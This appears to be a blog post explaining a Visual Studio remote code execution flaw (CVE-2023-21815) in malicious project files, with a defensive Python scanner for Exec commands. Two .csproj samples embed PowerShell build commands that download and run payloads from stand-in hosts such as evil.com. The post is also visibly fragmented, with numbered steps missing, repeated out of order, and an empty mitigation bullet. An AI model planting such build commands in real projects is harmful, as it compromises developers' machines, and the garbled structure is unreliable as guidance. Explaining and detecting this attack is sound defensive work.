CVE-2023-21815 - Visual Studio Remote Code Execution Vulnerability Explained

*Published June 2024*

Introduction

In February 2023, Microsoft disclosed a critical security flaw—CVE-2023-21815—affecting Visual Studio, its popular development environment used by millions worldwide. This post breaks down what the vulnerability is, how it works, real-world exploit options, and how to stay safe. We'll use clear language, real code snippets, and provide references for deeper reading.

What is CVE-2023-21815?

CVE-2023-21815 is a Remote Code Execution (RCE) vulnerability in Visual Studio. In simple terms, this means an attacker can run arbitrary code on a victim’s computer, just by getting them to open a malicious solution (or project) file in Visual Studio.

Official Microsoft description

> *"A remote code execution vulnerability exists in Visual Studio when the software loads a malicious repository containing crafted files."*

How Does the Attack Work?

The vulnerability is triggered when a specially crafted Visual Studio project or solution file is opened. Visual Studio can automatically execute tasks (like building or debugging) defined in configuration files such as project and solution files (.csproj, .vbproj, .sln, etc.). If these files contain malicious entries, Visual Studio may end up running the commands defined there.

2. Trick you into opening the solution/project in Visual Studio.

Code Example: Malicious MSBuild Command

Inside a Visual Studio project file (such as .csproj), an attacker can embed commands that trigger on build events.

Benign Example

```xml
<Target Name="AfterBuild">
  <Exec Command="echo Hello, this is safe!" />
</Target>
```

Malicious Example

```xml
<Target Name="AfterBuild">
  <Exec Command="powershell -ExecutionPolicy Bypass -NoP 'Invoke-WebRequest http://malicious.example.com/payload.exe -OutFile C:\Temp\payload.exe; Start-Process C:\Temp\payload.exe'" />
</Target>
```


*This downloads and runs a dangerous executable from the internet.*

Victim Opens in Visual Studio

- Victim clones/downloads and opens the project file.
  - Visual Studio may trigger the "AfterBuild" event automatically—especially when restoring NuGet packages or compiling.

Microsoft published their own advisory and patch

- Microsoft Security Update Guide: CVE-2023-21815
- Visual Studio Release Notes 17.5

Community Write-ups

- GitHub Security Lab: Malicious Build Events *(Related to build events, not CVE-specific but explains the danger)*
- PortSwigger: Attacking CI/CD pipelines

1. Attacker’s malicious .csproj

```xml
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
  <Target Name="AfterBuild">
    <Exec Command="powershell -nop -c &quot;IEX (New-Object Net.WebClient).DownloadString('http://evil.com/bad.ps1')&quot;" />
  </Target>
</Project>
```

2. Victim opens and builds.

Update Visual Studio:

Microsoft fixed this vulnerability in Visual Studio 2022 version 17.5 and later. Update immediately from Visual Studio Downloads.

Open .csproj, .vbproj, and .sln files in Notepad and check for suspicious <Exec> commands.
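
The manual check above can be scripted. This is an added example, not code from the original post or from Microsoft: it lists every `<Exec>` command in an MSBuild project file and, going slightly beyond the text, the legacy `PreBuildEvent`/`PostBuildEvent` properties, marking entries that match a heuristic keyword list. The function names, keyword list and sample project are assumptions made for illustration; `.sln` files are not XML and are not covered.

```python
import re
import xml.etree.ElementTree as ET

# Heuristic markers chosen for this example; tune them for your environment.
SUSPICIOUS = re.compile(
    r"powershell|pwsh|invoke-webrequest|downloadstring|\biex\b|"
    r"certutil|bitsadmin|\bcurl\b|\bwget\b|https?://", re.IGNORECASE)
LEGACY_EVENTS = {"PreBuildEvent", "PostBuildEvent"}

# Constructed sample project (not taken from a real repository).
SAMPLE = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <PostBuildEvent>echo done</PostBuildEvent>
  </PropertyGroup>
  <Target Name="AfterBuild">
    <Exec Command="echo Hello, this is safe!" />
  </Target>
  <Target Name="Prep" BeforeTargets="Build">
    <Exec Command="powershell -NoP -File tools/fetch.ps1 http://example.invalid/a" />
  </Target>
</Project>"""

def local(tag):
    """Drop the XML namespace that old-style project files put on every tag."""
    return tag.rsplit("}", 1)[-1]

def finding(where, command):
    return {"where": where, "command": command,
            "suspicious": bool(SUSPICIOUS.search(command))}

def audit_project(xml_text):
    """List every shell command the project file asks MSBuild to run."""
    if "<!DOCTYPE" in xml_text.upper():
        raise ValueError("DOCTYPE is not expected in a project file")
    root = ET.fromstring(xml_text)
    results = []
    for elem in root.iter():
        name = local(elem.tag)
        if name == "Target":
            for task in elem.iter():
                if local(task.tag) == "Exec":
                    results.append(finding(elem.get("Name", "?"), task.get("Command", "")))
        elif name in LEGACY_EVENTS and (elem.text or "").strip():
            results.append(finding(name, elem.text.strip()))
    return results

if __name__ == "__main__":
    for f in audit_project(SAMPLE):
        print("REVIEW" if f["suspicious"] else "ok    ", f["where"], "->", f["command"])
```

A keyword match is only a prompt for manual review: any `<Exec>` in a project from an untrusted source deserves a read before the first build.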

- Disable automatic builds/restores:

Conclusion

CVE-2023-21815 is a textbook example of how build systems, if not carefully handled, can become dangerous. Visual Studio is incredibly powerful, but with great power comes great risk if you open unknown code—patch, review, and always verify your sources.

References

- Microsoft CVE-2023-21815 Advisory
- CERT Advisory
- PortSwigger Write-Up


*Stay safe, update often, and always check that project file before you click "build!"*

Timeline

Published on: 02/14/2023 21:15:00 UTC
Last modified on: 04/11/2023 21:15:00 UTC